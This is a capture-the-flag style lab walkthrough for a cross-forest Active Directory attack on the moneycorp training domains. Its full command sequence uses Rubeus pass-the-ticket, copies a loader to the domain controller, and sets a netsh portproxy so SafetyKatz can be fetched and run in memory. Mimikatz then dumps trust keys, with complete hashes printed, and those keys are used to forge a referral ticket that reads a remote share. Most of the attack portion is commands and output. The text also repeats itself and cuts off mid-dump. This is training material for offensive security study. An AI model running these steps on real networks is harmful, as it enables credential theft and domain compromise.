20 - LO2️0️

Learning Object 20

Tasks

1 - With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩

Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩

Solutions

We need the trust key for the trust between dollarcorp and eurocrop, which can be retrieved using Mimikatz or SafetyKatz.

Start a process with DA privileges. Run the below command from an elevated command prompt:

First to all start a process as DA:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Run the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

mimikatz(commandline) # lsadump::evasive-trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 5/19/2025 1:37:28 PM - CLEAR   - 44 09 6f fc 1a 4c 7f 37 6d 28 3d dd 7c 01 38 b3 8a a3 ae 67 21 86 f7 d6 cc 64 7a 84 a4 fb ec 09 63 a5 67 d0 7d 46 ae d9 d3 01 67 9d 00 93 db e6 60 63 36 aa c1 ee 12 18 c0 22 f8 d0 79 b8 b2 c5 71 91 28 98 e2 21 36 09 f5 36 02 bf 9b 60 6e 37 95 8b 79 2c e2 a4 9a a5 55 20 a6 b9 f1 30 b7 71 cb 20 5d 60 8c b9 e8 69 2a 5e cb c3 3e 22 7b a5 e6 08 f1 df 92 d3 a3 ca e0 f5 b2 5a cb 7a ad ea 41 28 a1 ff 5b b7 d3 30 79 b9 95 a0 bb 22 a6 b7 02 f4 2d 2e de fe 7c 53 80 33 5c 81 ea 06 ba c5 7d 48 3e 54 20 87 50 27 d9 07 eb d8 0b ca a6 8b b1 43 92 ca bf 00 8f 57 4f f8 85 ae 90 ab 84 91 ca 46 53 cb 4d 17 af 41 b5 44 16 7f 35 74 4a a3 a0 8e 63 74 ed 0a 8b 4e b1 7f 2e db db 00 07 d9 51 e5 68 62 72 74 29 ad 7f cd e3 2f 73 6b 89 48
        * aes256_hmac       e9a951eb9284fa8fb97d517ee1aa3aa63bedb68f047bdef968fc07909e3d3473
        * aes128_hmac       82479821a01655434a6b58c8a12ede0a
        * rc4_hmac_nt       9efbee4d5451ee87a336fdd844841a60

 [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - 75 a4 95 49 95 c5 3d 16 51 d6 dd ea 1b 5e ef a4 e1 4a a4 f6 ad de 59 dd 44 23 8d f7 26 68 e6 4e 6f 47 4c c5 88 ac 28 82 44 2d c4 3d 93 5a 81 d4 1a 59 f5 19 c4 b7 c4 02 8e e6 b7 af 93 2a b9 e3 8d 6c 69 fa bf 89 f7 1b ed 62 7c cf 58 0c 39 9c 5c 81 7d aa 5c f9 83 c8 8e 99 0f 80 db 04 be 05 59 b9 17 23 14 c2 30 69 a5 97 45 98 29 18 bf da ee 67 4b 82 80 ba 46 03 78 ce 7a 25 ea 48 cb 07 c8 8e b4 f2 75 c4 45 47 6e 74 59 5d 95 7a 46 3a a8 87 27 9a 09 4f bd 0e 21 6a 01 a7 3e 6d 30 31 fc f0 e3 00 80 27 96 e6 95 d5 8a 60 71 22 f8 d8 6e 6f f9 5c 31 50 00 ee b6 d2 2f e7 82 97 aa 14 d0 32 07 8a 38 87 66 47 f6 33 3c 34 71 8f 7c f0 8c 79 30 84 35 6c 04 cd 06 fd ed 9f 4a 10 56 6d f1 4d b9 90 45 c8 25 41 a9 7f 15 a8 ea 5b a4 42
        * aes256_hmac       1be6d20275db04c936e2280d803afaf58aca9aabe04664db9484c20206590a0a
        * aes128_hmac       ceb4bb60cc4546c039ca70454cf27321
        * rc4_hmac_nt       9e01158873ab48589848840d3b4f5ba3

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 4/18/2025 9:04:35 PM - CLEAR   - 1a 5f 93 d7 72 ef 03 2a 0f e3 9c 22 ee 65 3f c2 bb 11 51 1d d0 3c 7a fc 91 05 79 cb 2e 27 43 11 67 a8 18 e0 24 0b aa c1 71 0f e4 dc 0c b3 66 84 79 c2 74 f6 b0 88 49 19 90 ea f3 0c 02 1e 59 97 3f aa 42 a9 66 cf 9d a8 bc a4 aa 98 b4 d4 29 c3 aa a8 5e 5a ae 0f 93 21 51 6d fd ff a8 2f da cd 8c 3c fc 4c 1d 2f 51 c4 2e 89 01 20 29 2d 9d c7 40 d5 c7 1d 19 3c 38 38 94 3f 5b 67 a6 e6 68 4b 74 a2 a3 0d 44 0c dd 62 45 e7 01 46 83 0b 15 1d af 5f 0c 81 1e b8 ac eb 6f f2 79 fd 1f db af df cc 28 72 3d 50 a0 e8 50 62 57 22 64 c8 de fe 55 ef 94 b8 1f 54 76 65 7e 8c 0a a4 1b f6 45 03 1f 78 9f 1c de cf 52 c9 34 d2 c9 a1 f9 63 23 43 7a 25 f0 1d a8 b8 9d 25 44 f3 f7 c9 4d e5 2f 88 f9 1d c5 b3 62 59 bf ba e9 ea 97 f5 fb bb a1 82 a2
        * aes256_hmac       6ebf48c7d7ad99b143c9b6ad518396606a395a60dc4165e83233a1c0c5716412
        * aes128_hmac       7217c5114ba08994c10edf30106e5ce8
        * rc4_hmac_nt       5f8e757822d6f6f2977af2dc94135713

 [Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - f5 ec 63 70 27 4e 2d 3b c9 cf d2 5c aa 42 3f 9e 84 43 1f ad ef 68 6f c0 0e ca 08 9f ee 7e a5 98 15 ca 17 70 e9 ee a5 02 b3 50 f5 9c fe 29 2c c1 f4 96 d3 7b f0 21 62 6b eb 3b 54 bc a3 90 99 e1 d4 1a 1a 0b 97 f1 bf d5 78 da 7e d0 cb 61 77 03 c2 08 c7 9f 9a 86 64 7b a1 0b 98 3c ba 99 bf 14 83 ff c5 f9 37 cb 1a c2 a8 1c 28 85 be 07 93 11 cb cc 35 88 5c 34 e5 d9 a1 0f ad 32 f5 e8 11 07 42 14 be 76 c3 fe 3a 77 a8 04 4c 17 ff 93 19 d0 70 ec c2 c9 0d 00 3b 2d 32 d9 d5 cc 1e f2 e0 f6 46 56 f8 cf 9c 2c 51 d8 15 f9 cd 0c d2 10 92 a8 75 af 26 8c 05 05 64 d1 be 58 03 65 3f c3 ed cd 63 05 ca 20 08 b7 09 d8 22 41 e0 a0 f7 2b 71 b7 48 ae c5 23 5b 50 d4 bf 15 a0 d4 a0 37 7d f3 d4 e3 77 93 e9 21 28 71 3d ad 9c fd 23 ce 6c 00 5d
        * aes256_hmac       8a1e8a22021baf33cf5c186b2b257cace73088402e11545ede9c112545b6c05f
        * aes128_hmac       f97130aff8d849fa56b61a80d77492b0
        * rc4_hmac_nt       e1ff686c5ac2880aaecb34a8c8db19ee


Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       0d13893ad9375052e55276afd3aa59eee6ac13ecbb34ec595551a22850e5a21f
        * aes128_hmac       1f367d7f4a602f7db49b28e8954e38b3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       677e0e1d4b663a16d24f8b8463d23e21a4ee23d2dab509221bf3444a95902fa1
        * aes128_hmac       54713b68042823a0d642e3c8b55f2bf3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       d006160aeebee4bc4736932b02e2021e58e712bb614809a9e5d7a885c830ebf3
        * aes128_hmac       99e79607dc6c200854a32f6421f80e6c
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc

 [Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       391de5a8a239c71f684355e04665f636c4b412caf5b89d7d1940e06a5a47d101
        * aes128_hmac       d39fd719f0a4e95b7b2a5c39d1c7feb2
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc


Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b0f0a55ada2dfc87111ddbdc4072a8cc8679f4a5f79242f6510c57df0a65c831
        * aes128_hmac       65770a68dff396a49468fe35cbc98cbe
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       3b0cc0612e0bed52b403f6048bc4cd86233bb75a2848aa6d24385e9b61fad2b1
        * aes128_hmac       0c32942d43e18125da040ada11ee8d5e
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57

 [Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       7a4cd11bc3ce3f83c5788e7dfe1e9bdd5c0187e2a793f9134e3bc1241497f7fb
        * aes128_hmac       aaaba3a50e251cbafda5bf205e9dd7ec
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57


mimikatz(commandline) # exit
Bye!

Let's Forge a referral ticket.

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

Note that we are not injecting any SID History here as it would be filtered out. Run the below command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:348f49cf83691a35ea71980994f02170 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

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

Copy the base64 encoded ticket from above and use it in the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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

Once the ticket is injected, we can access explicitly shared resources on eurocorp-dc.

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

Note that the only way to enumerate accessible resources (service on a machine) in eurocorp would be to request a TGS for each one and then attempt to access it.

Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩

Based on the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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

cifs is the service for which a TGS is requested from eurocorp-dc.

Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt

Dollarcorp DAs can read this!

Previous19 - LO1️9️Next21 - LO2️1️

Last updated 17 days ago

20 - LO2️0️

Learning Object 20

Tasks

1 - With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩

Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩

Solutions

We need the trust key for the trust between dollarcorp and eurocrop, which can be retrieved using Mimikatz or SafetyKatz.

Start a process with DA privileges. Run the below command from an elevated command prompt:

First to all start a process as DA:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Run the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

mimikatz(commandline) # lsadump::evasive-trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 5/19/2025 1:37:28 PM - CLEAR   - 44 09 6f fc 1a 4c 7f 37 6d 28 3d dd 7c 01 38 b3 8a a3 ae 67 21 86 f7 d6 cc 64 7a 84 a4 fb ec 09 63 a5 67 d0 7d 46 ae d9 d3 01 67 9d 00 93 db e6 60 63 36 aa c1 ee 12 18 c0 22 f8 d0 79 b8 b2 c5 71 91 28 98 e2 21 36 09 f5 36 02 bf 9b 60 6e 37 95 8b 79 2c e2 a4 9a a5 55 20 a6 b9 f1 30 b7 71 cb 20 5d 60 8c b9 e8 69 2a 5e cb c3 3e 22 7b a5 e6 08 f1 df 92 d3 a3 ca e0 f5 b2 5a cb 7a ad ea 41 28 a1 ff 5b b7 d3 30 79 b9 95 a0 bb 22 a6 b7 02 f4 2d 2e de fe 7c 53 80 33 5c 81 ea 06 ba c5 7d 48 3e 54 20 87 50 27 d9 07 eb d8 0b ca a6 8b b1 43 92 ca bf 00 8f 57 4f f8 85 ae 90 ab 84 91 ca 46 53 cb 4d 17 af 41 b5 44 16 7f 35 74 4a a3 a0 8e 63 74 ed 0a 8b 4e b1 7f 2e db db 00 07 d9 51 e5 68 62 72 74 29 ad 7f cd e3 2f 73 6b 89 48
        * aes256_hmac       e9a951eb9284fa8fb97d517ee1aa3aa63bedb68f047bdef968fc07909e3d3473
        * aes128_hmac       82479821a01655434a6b58c8a12ede0a
        * rc4_hmac_nt       9efbee4d5451ee87a336fdd844841a60

 [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
